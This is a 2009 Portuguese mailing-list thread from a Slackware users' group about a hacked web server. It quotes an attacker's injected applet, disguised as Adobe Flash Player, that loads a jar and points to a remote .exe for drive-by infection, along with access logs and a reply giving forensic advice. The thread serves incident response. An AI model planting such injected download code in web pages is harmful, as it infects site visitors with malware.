2009/8/11 Jorge Filho <[email protected]>: > Olá pessoal, obrigado pelas ajudas. > O que eu consegui rastrear até agora foi o seguinte, o cara conseguiu editar > o index.php do site e colocou o seguinte applet: > <applet name="Adobe FlashPlayer" code="Inicio.class" > archive="http://www.exemplo.com/audio/FlashPlayer.jar"; height="10" > width="1"> > <param name="url" > value="http://merlincosmeticos.com.br/cache/foto125.exe";> > </applet> > Ele também adicionou esse FlashPlayer.jar no diretório audio do servidor, e > tinha também esse arquivo asd.html na raiz. > As datas dos arquivos são: > -rw------- 1 www-data www-data 9,8K 2009-08-10 22:53 FlashPlayer.jar > -r-xr-xr-x 1 www-data www-data 12K 2009-08-11 14:03 index.php > No logo do /var/log/apache/access.log está o seguinte: > 201.78.54.160 - - [10/Aug/2009:15:03:17 -0300] "GET /asd.html HTTP/1.1" 200 > 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13) > Gecko/2009073022 Firefox/3.0.13" > 189.26.198.238 - - [10/Aug/2009:15:07:01 -0300] "GET /asd.html HTTP/1.1" 200 > 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 189.26.198.238 - - [10/Aug/2009:15:07:39 -0300] "GET /asd.html HTTP/1.1" 304 > - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 189.26.198.238 - - [10/Aug/2009:15:09:43 -0300] "GET /asd.html HTTP/1.1" 304 > - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 201.89.53.126 - - [10/Aug/2009:15:48:12 -0300] "GET /asd.html HTTP/1.1" 200 > 808 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; > SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618)" > Se procurar FlashPlayer.jar no log então, acha muito, porque muita gente > deve ter baixado. > Outra coisa que acho que pode ser uma falha na segurança também é que todos > os arquivos estavam com permissão 777 > Sobre o ftp, tem alguns usuários com senha fraca sim, mais o ftp roda em > chroot com autenticação mysql, o usuário já cai na pasta sem ter como sair, > acho dificil ter acontecido algo pelo ftp, mas claro, nada é impossível. > Vou analisar mais coisas aqui, mas to meio confuso, é a primeira vez que > tenho um ataque no servidor, situação estranha, mais agora tenho que > aprender como o cara fez isso pra consertar o que tá errado. > ##########################################################################################
Você quer saber o que aconteceu? A primeira coisa de cara que eu recomendo e você puxar a tomada dessa maquina ;). Faça uma imagem do disco da maquina e trabalhe em cima dessa imagem. Faça a imagem com um live cd. A partir dai comesse a analisar a imagem. Nada que você conseguir ver na maquina agora pode ser considerado seguro se você esta vendo atraves de um sistema possivelmente comprometido. Claro que isso pode ser um pouco de exageiro, mas e verdade :p. -- Mi blog eres su blog: https://www.lccv.ufal.br/~psycho/ @psycho_mantys : http://twitter.com/psycho_mantys http://www.slackware.com U.L. : 450347 Fnord --~--~---------~--~----~------------~-------~--~----~ GUS-BR - Grupo de Usuários de Slackware Brasil http://www.slackwarebrasil.org/ http://groups.google.com/group/slack-users-br Antes de perguntar: http://www.istf.com.br/perguntas/ Para sair da lista envie um e-mail para: [email protected] -~----------~----~----~----~------~----~------~--~---
